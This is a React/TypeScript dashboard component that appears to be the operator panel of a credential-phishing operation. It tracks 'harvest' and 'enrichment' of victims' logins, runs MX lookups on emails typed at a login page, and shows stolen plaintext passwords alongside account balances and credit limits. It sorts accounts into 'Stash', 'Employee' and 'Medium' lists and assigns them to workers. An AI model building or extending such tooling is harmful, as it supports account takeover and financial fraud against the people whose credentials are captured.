import { useCallback, useMemo, useState } from "react";
import { isActiveOperatorAlert, type AppEvent } from "../api";
import { useAuth } from "../auth/AuthContext";
import {
  Column,
  isLoginProgressEvent,
  pullFromEvent,
  sortEventsNewestFirst,
  statusMeta,
} from "../components/AccountFeed";
import { EventDetailModal, summaryFromEvent } from "../components/EventDetailModal";
import { useMailMxStats } from "../components/MailMxStatsBar";
import { useToast } from "../components/Toast";
import { isElectronDesktop } from "../desktop";
import { useLiveEvents } from "../hooks/useLiveEvents";
import { useLocalEventsQuery } from "../hooks/localEventsStore";
import { useStashEnabled } from "../hooks/useStashEnabled";
import {
  classifyAccountType,
  isEmployeeAccount,
  isMediumAccount,
} from "../lib/accountType";
import { mailBucketFromEmail, mailBucketLabel } from "../lib/mailGuess";
import { relativeTime } from "../lib/utils";

function mergeById(base: AppEvent[], extra: AppEvent[]): AppEvent[] {
  const map = new Map<number, AppEvent>();
  for (const e of base) map.set(e.id, e);
  for (const e of extra) map.set(e.id, e);
  return [...map.values()];
}

function landedLabel(ev: AppEvent): string {
  const stage = ev.stockStage || "none";
  if (stage === "pending") return "Stash · Pending";
  if (stage === "ready") return "Stash · Ready";
  if (stage === "bad") return "Stash · Bad";
  if (stage === "non_stash") return "Held";
  if (isEmployeeAccount(ev)) return ev.listUsed ? "Employee · Used" : "Employee";
  if (isMediumAccount(ev)) return ev.listUsed ? "Medium · Used" : "Medium";
  return "Unsorted";
}

function isToday(iso: string | null | undefined): boolean {
  if (!iso) return false;
  const d = new Date(iso);
  const now = new Date();
  return (
    d.getFullYear() === now.getFullYear() &&
    d.getMonth() === now.getMonth() &&
    d.getDate() === now.getDate()
  );
}

function withinHours(iso: string | null | undefined, hours: number): boolean {
  if (!iso) return false;
  const t = Date.parse(iso);
  if (!Number.isFinite(t)) return false;
  return Date.now() - t <= hours * 3600_000;
}

const ALL_OPTS = { limit: 2000, includeHidden: false } as const;

export function DashboardPage() {
  const { user, setAssignedKeys } = useAuth();
  const { push } = useToast();
  const isAdmin = user?.role === "admin";
  const desktop = isElectronDesktop();
  const [selected, setSelected] = useState<AppEvent | null>(null);
  const [filter, setFilter] = useState("");
  const mx = useMailMxStats();
  const { stashEnabled, setStashEnabled } = useStashEnabled();

  const onAssignment = useCallback(
    (info: {
      resourceKey: string;
      message: string;
      assignedKeys: string[];
      events: AppEvent[];
    }) => {
      setAssignedKeys(info.assignedKeys);
      push(info.message, "ok");
    },
    [push, setAssignedKeys]
  );

  const onUnassignment = useCallback(
    (info: { resourceKey: string; message: string; assignedKeys: string[] }) => {
      setAssignedKeys(info.assignedKeys);
      push(info.message, "info");
    },
    [push, setAssignedKeys]
  );

  const { status, events: liveEvents, error } = useLiveEvents({
    enabled: Boolean(user),
    onAssignment,
    onUnassignment,
  });
  const meta = statusMeta(status);
  const { events: localSeed } = useLocalEventsQuery(
    ALL_OPTS,
    Boolean(desktop && isAdmin)
  );

  const all = useMemo(
    () => mergeById(desktop && isAdmin ? localSeed : [], liveEvents),
    [desktop, isAdmin, localSeed, liveEvents]
  );

  const selectedLive = selected
    ? all.find((e) => e.id === selected.id) || selected
    : null;

  const visible = useMemo(() => all.filter((e) => !e.hidden), [all]);

  const stats = useMemo(() => {
    let inLogin = 0;
    let enriching = 0;
    let ready = 0;
    let readyToday = 0;
    let ready1h = 0;
    let failed = 0;
    let pending = 0;
    let stockReady = 0;
    let employee = 0;
    let medium = 0;
    let alerts = 0;
    let completedGmail = 0;
    let completedOutlook = 0;
    let completedOther = 0;
    for (const e of visible) {
      const pull = pullFromEvent(e);
      if (isActiveOperatorAlert(pull?.operatorAlert)) alerts += 1;
      if (e.status === "failed") failed += 1;
      if (e.status === "processing") {
        if (pull?.token) enriching += 1;
        else inLogin += 1;
      }
      if (e.status === "ready") {
        ready += 1;
        const when = e.processedAt || e.updatedAt;
        if (isToday(when)) readyToday += 1;
        if (withinHours(when, 1)) ready1h += 1;
        const t = classifyAccountType(e);
        if (t === "employee") employee += 1;
        else if (t === "medium") medium += 1;
        const mail = mailBucketFromEmail(pull?.email);
        if (mail === "gmail") completedGmail += 1;
        else if (mail === "outlook") completedOutlook += 1;
        else completedOther += 1;
      }
      const stage = e.stockStage || "none";
      if (stage === "pending") pending += 1;
      if (stage === "ready") stockReady += 1;
    }
    return {
      inLogin,
      enriching,
      ready,
      readyToday,
      ready1h,
      failed,
      pending,
      stockReady,
      employee,
      medium,
      alerts,
      completedGmail,
      completedOutlook,
      completedOther,
      completedMailTotal: completedGmail + completedOutlook + completedOther,
    };
  }, [visible]);

  const recentReady = useMemo(() => {
    const q = filter.trim().toLowerCase();
    return visible
      .filter((e) => e.status === "ready")
      .filter((e) => {
        if (!q) return true;
        const s = summaryFromEvent(e);
        const pull = pullFromEvent(e);
        return (
          s.email.toLowerCase().includes(q) ||
          s.type.toLowerCase().includes(q) ||
          landedLabel(e).toLowerCase().includes(q) ||
          (pull?.password || "").toLowerCase().includes(q)
        );
      })
      .sort(sortEventsNewestFirst)
      .slice(0, 60);
  }, [visible, filter]);

  const myItems = useMemo(
    () => visible.filter((e) => e.status === "ready").sort(sortEventsNewestFirst),
    [visible]
  );

  async function toggleStash() {
    try {
      await setStashEnabled(!stashEnabled);
      push(stashEnabled ? "Stash paused" : "Stash on — admins go to Pending", "ok");
    } catch (err) {
      push(err instanceof Error ? err.message : "Could not update stash", "error");
    }
  }

  if (!isAdmin) {
    return (
      <div className="page page-wide page-fill">
        <header className="page-header">
          <h1>My items</h1>
          <span className={`status-chip ${meta.className}`}>
            <span className="status-dot" />
            {meta.label}
          </span>
        </header>
        {error && <div className="banner error">{error}</div>}
        <div className="feed-board feed-board-single">
          <Column
            title="Assigned to you"
            items={myItems}
            empty="Nothing assigned to your account yet."
            isAdmin={false}
            onOpen={setSelected}
            pageSize={25}
          />
        </div>
        {selectedLive && (
          <EventDetailModal event={selectedLive} onClose={() => setSelected(null)} />
        )}
      </div>
    );
  }

  return (
    <div className="page page-wide page-fill page-dash">
      <header className="page-header">
        <div>
          <h1>Live feed</h1>
          <p className="muted page-blurb">Overview of harvest, enrichment, and where logins land</p>
        </div>
        <div className="page-header-actions">
          <input
            className="search header-search"
            placeholder="Filter completed email, type, destination…"
            value={filter}
            onChange={(e) => setFilter(e.target.value)}
          />
          <button
            type="button"
            className={`stash-toggle${stashEnabled ? " is-on" : ""}`}
            onClick={() => void toggleStash()}
            title={
              stashEnabled
                ? "Stash on: finished admins go to Pending. Employee/medium always go to their lists."
                : "Stash off: finished admin logins stay unsorted. Employee/medium still go to their lists."
            }
          >
            Stash {stashEnabled ? "on" : "off"}
          </button>
          <span className={`status-chip ${meta.className}`}>
            <span className="status-dot" />
            {meta.label}
          </span>
        </div>
      </header>

      {error && <div className="banner error">{error}</div>}

      <section className="ops-kpis" aria-label="Pipeline">
        <Kpi label="In login" value={stats.inLogin} hint="Email/password, no token yet" />
        <Kpi label="Enriching" value={stats.enriching} hint="Token in, GraphQL running" />
        <Kpi label="Completed" value={stats.ready} hint={`${stats.readyToday} today · ${stats.ready1h} last hour`} />
        <Kpi label="Stash pending" value={stats.pending} hint={`${stats.stockReady} ready stock`} tone="accent" />
        <Kpi label="Employee" value={stats.employee} />
        <Kpi label="Medium" value={stats.medium} />
        <Kpi label="Failed" value={stats.failed} tone={stats.failed ? "bad" : undefined} />
        <Kpi label="Operator" value={stats.alerts} tone={stats.alerts ? "bad" : undefined} />
      </section>

      <section className="ops-mx" aria-label="Mail mix">
        <MxPanel
          title="Entered emails"
          blurb="MX lookup on emails typed at login"
          gmail={mx.gmail}
          outlook={mx.outlook}
          other={mx.other}
          total={mx.total}
        />
        <MxPanel
          title="Completed logins"
          blurb="Finished accounts by mailbox domain"
          gmail={stats.completedGmail}
          outlook={stats.completedOutlook}
          other={stats.completedOther}
          total={stats.completedMailTotal}
        />
      </section>

      <section className="ops-recent surface">
        <header className="ops-recent-head">
          <h2>Recently completed</h2>
          <span className="muted tiny">{recentReady.length} shown</span>
        </header>
        <div className="ops-recent-table-wrap">
          <table className="logins-table ops-recent-table">
            <thead>
              <tr>
                <th>When</th>
                <th>Email</th>
                <th>Pass</th>
                <th>Type</th>
                <th>Mail</th>
                <th>Tags</th>
                <th>Bal</th>
                <th>Avail</th>
                <th>Limit</th>
                <th>Landed</th>
              </tr>
            </thead>
            <tbody>
              {recentReady.length === 0 && (
                <tr>
                  <td colSpan={10} className="muted">
                    {visible.some(isLoginProgressEvent)
                      ? "No completed logins yet — harvest is still in progress."
                      : "No completed logins in this window."}
                  </td>
                </tr>
              )}
              {recentReady.map((ev) => {
                const s = summaryFromEvent(ev);
                const pull = pullFromEvent(ev);
                const mail = mailBucketFromEmail(pull?.email);
                return (
                  <tr
                    key={ev.id}
                    className="logins-row"
                    onClick={() => setSelected(ev)}
                  >
                    <td
                      className="mono tiny"
                      title={new Date(ev.processedAt || ev.updatedAt).toLocaleString()}
                    >
                      {relativeTime(ev.processedAt || ev.updatedAt)}
                    </td>
                    <td className="truncate" title={s.email}>
                      {s.email}
                    </td>
                    <td className="mono tiny truncate col-pass" title={pull?.password || undefined}>
                      {pull?.password || "—"}
                    </td>
                    <td>
                      <span className={`type-pill type-${classifyAccountType(ev)}`}>
                        {s.type === "progress" ? classifyAccountType(ev) : s.type}
                      </span>
                    </td>
                    <td>
                      <span className={`mx-pill mx-pill-${mail}`}>
                        {mailBucketLabel(mail)}
                      </span>
                    </td>
                    <td className="truncate muted tiny" title={s.tags.join(", ")}>
                      {s.tags.length ? s.tags.join(", ") : "—"}
                    </td>
                    <td className="mono tiny">{s.balance}</td>
                    <td className="mono tiny">{s.credit}</td>
                    <td className="mono tiny">{s.creditLimit}</td>
                    <td className="tiny">{landedLabel(ev)}</td>
                  </tr>
                );
              })}
            </tbody>
          </table>
        </div>
      </section>

      {selectedLive && (
        <EventDetailModal event={selectedLive} onClose={() => setSelected(null)} />
      )}
    </div>
  );
}

function Kpi({
  label,
  value,
  hint,
  tone,
}: {
  label: string;
  value: number;
  hint?: string;
  tone?: "accent" | "bad";
}) {
  return (
    <div className={`ops-kpi${tone ? ` is-${tone}` : ""}`}>
      <p className="ops-kpi-label">{label}</p>
      <p className="ops-kpi-value">{value.toLocaleString()}</p>
      {hint ? <p className="ops-kpi-hint">{hint}</p> : null}
    </div>
  );
}

function MxPanel({
  title,
  blurb,
  gmail,
  outlook,
  other,
  total,
}: {
  title: string;
  blurb: string;
  gmail: number;
  outlook: number;
  other: number;
  total: number;
}) {
  const share = (n: number) => (total ? Math.round((n / total) * 1000) / 10 : 0);
  return (
    <div className="ops-mx-panel surface">
      <div className="ops-mx-copy">
        <h2>{title}</h2>
        <p className="muted tiny">{blurb}</p>
      </div>
      <div className="ops-mx-nums">
        <div className="ops-mx-num mx-stat-gmail">
          <span>Google</span>
          <strong>{share(gmail)}%</strong>
          <em>{gmail.toLocaleString()}</em>
        </div>
        <div className="ops-mx-num mx-stat-outlook">
          <span>M365</span>
          <strong>{share(outlook)}%</strong>
          <em>{outlook.toLocaleString()}</em>
        </div>
        <div className="ops-mx-num mx-stat-other">
          <span>Other</span>
          <strong>{share(other)}%</strong>
          <em>{other.toLocaleString()}</em>
        </div>
      </div>
      <div className="ops-mx-bar" aria-hidden="true">
        <span className="is-gmail" style={{ width: `${share(gmail)}%` }} />
        <span className="is-outlook" style={{ width: `${share(outlook)}%` }} />
        <span className="is-other" style={{ width: `${share(other)}%` }} />
      </div>
    </div>
  );
}
